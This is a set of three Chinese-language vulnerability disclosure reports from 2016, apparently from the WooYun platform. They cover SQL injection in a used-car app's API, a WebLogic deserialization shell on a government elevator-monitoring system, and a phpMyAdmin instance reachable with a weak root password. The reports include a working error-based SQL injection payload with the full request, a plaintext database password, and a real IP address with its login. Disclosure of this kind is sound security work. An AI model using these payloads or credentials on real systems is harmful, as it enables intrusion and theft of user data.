漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：APP安全之SQL注入详细说明：目标：273二手车IOS APP检测发现以下地方存在SQL注入：（POST中的push_type，报错注入）code 区域POST https://appserv.273.cn/1.3/subscribe.updateClientId/?_api_time=1461545212.897876&_api_key=8a7f95774b1ce149fda1025298c310d9&_api_token=5UyTSYg9rhZy%2FkyyJPJTXhD88e9whsqPx9CobSuqNsAk0gaSp3Q7CyQgcq0NVYX6&_api_debug=1&_app_source=2&_app_type=2&_app_version=3.2.2 HTTP/1.1 Host: appserv.273.cn Content-Type: application/x-www-form-urlencoded Connection: keep-alive Proxy-Connection: keep-alive Accept: */* User-Agent: MainWebsite/3.2.2 (iPhone; iOS 9.3.1; Scale/2.00) Accept-Language: zh-Hans;q=1 Accept-Encoding: gzip, deflate Content-Length: 131 client_id=67BAE8C5-75A5-40F1-B8A7-6752478C62AD&push_id=db7da0fa6c938ef57ad343e76aeaf9b445efbac4a600e0c71dd9aa281d95f68a&push_type=1Payload：code 区域push_type=1 AND (SELECT 5743 FROM(SELECT COUNT(*),CONCAT(0x7177776d71,(SELECT (CASE WHEN (5743=5743) THEN 1 ELSE 0 END)),0x7169617a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- 漏洞证明：1、当前数据库用户2、所有数据库3、数据表，涉及60W+用户数据/170W+交易订单，具体就不深入了 修复方案：请多指教~版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-04-29 11:21厂商回复：谢谢，已经安排修复。后续发礼物。最新状态：暂无

漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述：rt详细说明： code 区域**.**.**.**:8080/esm/frame/default/esm/login/login_ca.jsp反序列getshellcode 区域**.**.**.**:8080/bea_wls_internal/test.jspmima:mask 区域*****og***** jdbc：code 区域jdbc.url=jdbc:oracle:thin:@(description=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=**.**.**.**)(PORT=1521))(ADDRESS=(PROTOCOL=TCP)(HOST=**.**.**.**)(PORT=1521))(load_balance=yes)(failover=on))(connect_data=(server=dedicated)(service_name=orcl))) jdbc.username=esm jdbc.password=esm_2012code 区域ESM ESM_ELEVATOR_ERROR_DETAIL 74679149 ESM ESM_ELEVATOR_ERROR_ORIGINAL 15758932 SYS AUD$ 12505835 ESM ESM_ELEVATOR_ERROR_DETAIL_61B 12308106 ESM ESM_ELEVATOR_ERROR_ORI_0505 11820609 SYS WRM$_SNAPSHOT_DETAILS 2893875 ESM ESM_ELEVATOR_ERROR_0616 2549527 ESM ESM_ELEVATOR_ERROR_422531_BAK 2496221 ESM ESM_ELEVATOR_ERROR_13812 2211545 ESM A_TEMP_ERROR_20141125 1082418 ESM JBPM4_HIST_ACTINST 825492 ESM A_TEMP_ERROR_E 808826 SYS WRI$_OPTSTAT_HISTGRM_HISTORY 805208 ESM ESM_ELEVATOR_ERROR 672370 ESM JBPM4_HIST_TASK 620218 ESM JBPM4_VARIABLE 600552 ESM ESM_ELEVATOR_EVERYDAY_STATUS 584731 ESM WL_WORKFLOW_TRACKING 554698 ESM ESM_ELEVATOR_ERROR_ORI_422531B 535158 ESM ESM_MESAGE_FLAG 360000 ESM ESM_ELEVATOR_EVERYDAY_STS0731 251305 ESM ESM_ELEVATOR_ERROR_ORI_13812 235414 SYS WRH$_SYSMETRIC_HISTORY 232760 漏洞证明： code 区域ESM ESM_ELEVATOR_ERROR_DETAIL 74679149 ESM ESM_ELEVATOR_ERROR_ORIGINAL 15758932 SYS AUD$ 12505835 ESM ESM_ELEVATOR_ERROR_DETAIL_61B 12308106 ESM ESM_ELEVATOR_ERROR_ORI_0505 11820609 SYS WRM$_SNAPSHOT_DETAILS 2893875 ESM ESM_ELEVATOR_ERROR_0616 2549527 ESM ESM_ELEVATOR_ERROR_422531_BAK 2496221 ESM ESM_ELEVATOR_ERROR_13812 2211545 ESM A_TEMP_ERROR_20141125 1082418 ESM JBPM4_HIST_ACTINST 825492 ESM A_TEMP_ERROR_E 808826 SYS WRI$_OPTSTAT_HISTGRM_HISTORY 805208 ESM ESM_ELEVATOR_ERROR 672370 ESM JBPM4_HIST_TASK 620218 ESM JBPM4_VARIABLE 600552 ESM ESM_ELEVATOR_EVERYDAY_STATUS 584731 ESM WL_WORKFLOW_TRACKING 554698 ESM ESM_ELEVATOR_ERROR_ORI_422531B 535158 ESM ESM_MESAGE_FLAG 360000 ESM ESM_ELEVATOR_EVERYDAY_STS0731 251305 ESM ESM_ELEVATOR_ERROR_ORI_13812 235414 SYS WRH$_SYSMETRIC_HISTORY 232760 修复方案：更新补丁版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：11确认时间：2016-05-11 15:56厂商回复：CNVD确认并复现所述情况,已经转由CNCERT向北京市政府信息化主管部门通报,并抄报北京分中心协助处置,由其后续协调网站管理单位处置.最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：首都网络安全日没看到你们……不开熏……详细说明：http://219.133.36.173:89/phpmyadmin/弱口令root 12345看用户表应该是Zabbix，这……一台沦陷，一片就完了证明是任子行的监控平台……执行命令作为一个合格的白帽子……就不反弹shell了和内网漫游了，点到为止，证明危害即可。漏洞证明：如上修复方案：修改口令和验证方式，来个20 RANK满分~(*^__^*) 嘻嘻版权声明：转载请注明来源 岛云首席鉴黄师@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-06 09:53厂商回复：这个不是监控中心，属于之前遗留的文件，感谢小伙伴提交，漏洞已修复，欢迎下次光临- -最新状态：暂无